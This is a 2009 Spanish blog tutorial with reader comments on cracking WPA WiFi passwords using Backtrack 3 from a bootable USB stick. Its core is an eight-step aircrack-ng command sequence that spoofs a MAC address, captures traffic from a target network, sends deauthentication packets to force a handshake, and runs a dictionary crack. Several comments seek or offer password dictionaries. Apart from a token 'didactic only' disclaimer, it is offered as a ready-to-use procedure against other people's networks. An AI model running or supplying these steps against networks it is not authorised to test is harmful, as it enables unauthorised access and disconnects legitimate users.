Obtener la clave WiFi con cifrados WPA gracias a Backtrack 3

Backtrack es una de las muchas distribuciones basadas en Linux, para lo que se conoce como auditorias, en las que básicamente se pueden obtener las claves de las redes Wifi con cifrados como WEP, WPA y otros. El más fácil de conseguir es el primero (lo digo por experiencia propia) aunque el segundo (y otros) también son factibles a la hora del crackeo.

Tenéis toda la información sobre esta distribución en Remote-Exploit. Ahora mismo la versión estable que hay es la #3 aunque ya hay otra beta de la #4. Para hacer más fácil el uso de ésta herramienta podéis descargarlo/instalarlo en un simple pincho (Pendrive) de la siguiente forma:

Necesitaremos el Backtrack 3 versión USB: que descargaremos desde aquí.
Descomprimimos el archivo y obtenemos dos carpetas que debemos meter en la raíz del pendrive (usb flash memory). Por ejemplo e:
En Windows vamos al menu de inicio > ejecutar > cmd
Se nos abre una “terminal” de Dos en la que tendremos que navegar hasta el pendrive, en este caso tecleamos e: y pulsamos Enter.
Tecleamos: cd boot para entrar en la carpeta boot que metimos antes en e: (el pendrive). Enter. Ahora ejecutamos el archivo bootinst.bat (escribe eso y dale al Enter).
Seguimos las instrucciones y ya deberíamos tener un pendrive “bootable” con el que podremos iniciar el sistema operativo Backtrack 3 antes de arrancar Windows.

Aunque también puedes lanzarlo desde un cd-live que grabes, a mi me parece más cómoda la opción del pendrive y más fácil de llevar.

Y para la obtención de la clave, pues podemos fijarnos en uno de los cientos y cientos de vídeos que hay por la red. Pero mejor hacerlo en uno, que sabemos que está bien explicado y que funciona, por ejemplo este:

Los pasos que sigue son estos:

  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger –mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
  7. aireplay-ng -0 5 -a (bssid)wlan0
  8. aircrack-ng (filename-01.cap)-w (dictionary location)

Por favor, ten en cuenta que toda la información de este artículo es únicamente didáctica. No la utilices para dañar o molestar a alguien, utilízala con ética y bajo tu responsabilidad.

Este artículo {#} fue escrito a fecha de 12 Mayo, 2009 por Nacho Alonso. Publicado bajo las categorías de: Tutoriales|Trucos

  .

Puedes leer los 11 comentarios que hay en esta entrada!

  1. Enrique VNo Gravatar
    Mayo 12th, 2009 a las 18:59

    Ah… muy interesante..pero esta aplicación tambien sirve para cifrados wep?

  2. nachoNo Gravatar
    Mayo 12th, 2009 a las 21:13

    @Enrique V, si claro!
    No he comentado nada de WEP porque es mucho más fácil… lo complicado es WPA.

  3. Alvaro LeivaNo Gravatar
    Mayo 12th, 2009 a las 21:24

    pero donde sacamos un diccionario wap bueno!!!!

  4. RazaMetaLNo Gravatar
    Mayo 13th, 2009 a las 1:58

    Buena información.

    Tienes un diccionario que puedas compartir?

  5. Clave WEP en infinitum » Zacateks.com
    Mayo 20th, 2009 a las 3:20

    [...] Por favor, ten en cuenta que toda la información de este artículo es únicamente didáctica. No la utilices para dañar o molestar a alguien, utilízala con ética y bajo tu responsabilidad. Visto en soygik [...]

  6. BABANo Gravatar
    Agosto 13th, 2009 a las 17:57

    pero donde sacamos un diccionario wap !!!!

  7. perikeneNo Gravatar
    Septiembre 3rd, 2009 a las 19:58

    hola buenas me gustaria saber donde puedo consegui un buen dicionario wap y luego donde lo tengo k poner el la pendrive

  8. rafaNo Gravatar
    Septiembre 3rd, 2009 a las 20:01

    hola buenas me gustaria saber donde puedo consegui un buen dicionario wap y luego donde lo tengo k poner el la pendrive.
    gracias

  9. julio cesarNo Gravatar
    Noviembre 17th, 2009 a las 18:06

    yo tengo diccionarios si alguien los quiere que se los pase pero necesito ayuda para conseguir hanshake que nopuedo eh echo todo lo que sale en el video pero no puedo conseguir hanshake si alguie consigue eso que me agregue lapegasso2000@hotmail.com saludo asi nos podemos ayudar todos para conseguir wpa solo wep ya se

  10. rufoNo Gravatar
    Enero 11th, 2010 a las 15:59

    necesito un manual o video en español….Backtrack y aircrack-ng son programas para lo mismo….wep y wap….?
    No se utilizarlos….q me recomendais de estos programas,…me gustaria aprender y estoy un poco verde,…El video q teneis sobre backtrack no lo entiendo x el idioma,….HELP….GRACIAS

  11. CLUB DEL PCNo Gravatar
    Enero 17th, 2010 a las 4:04

    bueno lo que hay que entender aca por si algunos creen que en un diccionario viene la clave wpa, esta tecnica trata de hacer entender que wpa es vulnerable a fuerza bruta con diccionario osea si es que por omision del admin puso una clave muy comun como es en las que viene en los diccionarios como por ejemplo “admin123″ en realidad si la clave es escrita de una forma casi imposible de adivinar nunca podran obtener la clave asi busque el diccionario que sea aca se trata de explikar que se puede encontrar la clave wpa por medio de esta tecnica y si tienes suerte de que la clave sea muy facil o comun puede que aparesca en un diccionario.las claves wep al contrario son distintas no se nesecita de diccionario simplemente hay que recolectar la data previo ataque claro. saludos

Agrega un comentario. Tu opinión es importante para nosotros!

*

*

Puedes usar un poco de XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Theme diseñado íntegramente por nacho ;-) y Alojado en Web 3.0 | Usando, como no, Wordpress